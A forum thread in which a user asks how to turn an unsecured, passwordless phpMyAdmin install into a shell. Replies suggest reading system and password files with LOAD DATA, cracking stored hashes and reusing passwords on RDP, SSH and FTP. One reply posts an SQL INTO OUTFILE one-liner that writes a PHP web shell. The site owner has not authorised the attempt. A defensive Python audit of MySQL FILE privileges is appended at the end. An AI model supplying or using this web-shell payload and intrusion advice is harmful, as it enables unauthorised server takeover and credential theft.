I found an unsecured phpMyAdmin
#1
I found an unsecured phpMyAdmin, as in no password.

Is there a way to use this to install a shell? I found a write-up about using the OUTPUT command in SQL to create a PHP shell, but I found out that the default user of phpMyAdmin can't execute OUTPUT due to a permission problem.

The default user can create, edit and delete databases or tables.

This is our company website. I tried to show it to them, but they ignore it because they are not currently using phpMyAdmin, since they accidentally deleted the WordPress files.


Thank you!
Reply
#2
Do you mean the OUTFILE command?

And if so... what user is the default user? Maybe that user doesn't have write access to the locations you've tried... but that doesn't necessarily mean they have 0 access to the file system.

How about the LOAD DATA/INFILE command? Perhaps you can use that to read information you wouldn't otherwise have access to. System info, configuration files, password files, sensitive docs, etc etc...

Are there any user accounts still in the database? Can you crack the hashes? It's not uncommon for people to reuse their passwords. Maybe the password for the admin account is the same as the RDP or SSH or FTP account...
Reply
#3
Code:
select “<? System($_REQUEST[‘cmd’]); ?>” into outfile “/opt/lampp/htdocs/cmd.php”;

2 seconds of googling.
Reply
#4
(06-07-2016, 08:37 PM)Sehaal Wrote:
Code:
select “<? System($_REQUEST[‘cmd’]); ?>” into outfile “/opt/lampp/htdocs/cmd.php”;

2 seconds of googling.

And clearly 0 seconds reading or comprehending the thread.
Reply
#5
Yes sir, the output command and Load Data/Infile are also blocked.

I found some exploits for phpMyAdmin 4.1.14, but sadly they are not disclosed to the public, especially this one, CVE-2014-6300, with which you can get admin access using CSRF.
Reply
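An added example, not part of any post in this thread: a defender-side audit of why OUTFILE and LOAD DATA are allowed or blocked for an account, based on MySQL's global FILE privilege and the `secure_file_priv` server variable. The account names, grant lines and variable values are constructed samples, and the severity labels are this example's own convention.

```python
import re

# Constructed sample data: SHOW GRANTS output per account and one server
# variable, as a DBA would collect them. All names and values are made up.
SAMPLE_GRANTS = {
    "pma@localhost": [
        "GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP ON *.* TO 'pma'@'localhost'",
    ],
    "backup@localhost": [
        "GRANT SELECT, FILE ON *.* TO 'backup'@'localhost'",
    ],
    "root@%": [
        "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION",
    ],
}
SAMPLE_VARS = {"secure_file_priv": ""}

GRANT_RE = re.compile(r"^GRANT\s+(.+?)\s+ON\s+(\S+)\s+TO\s", re.IGNORECASE)

def has_file_priv(grant_lines):
    """True if any global (*.*) grant carries FILE or ALL PRIVILEGES."""
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m or m.group(2).replace("`", "") != "*.*":
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
            return True
    return False

def file_io_scope(variables):
    """Map secure_file_priv to what the server allows (MySQL semantics)."""
    value = variables.get("secure_file_priv")
    if value is None or value.upper() == "NULL":
        return "disabled"          # no server-side import/export at all
    if value == "":
        return "unrestricted"      # any path the mysqld OS user can reach
    return "restricted to " + value

def audit(grants, variables):
    """Return (account, severity, scope) for every account holding FILE."""
    scope = file_io_scope(variables)
    severity = {"disabled": "low", "unrestricted": "high"}.get(scope, "medium")
    return [(acct, severity, scope)
            for acct, lines in sorted(grants.items()) if has_file_priv(lines)]

if __name__ == "__main__":
    for finding in audit(SAMPLE_GRANTS, SAMPLE_VARS):
        print(finding)
```

Accounts this reports are candidates for `REVOKE FILE ON *.* FROM ...`; an account without FILE, like the constructed `pma@localhost` here, gets the permission error described in the thread.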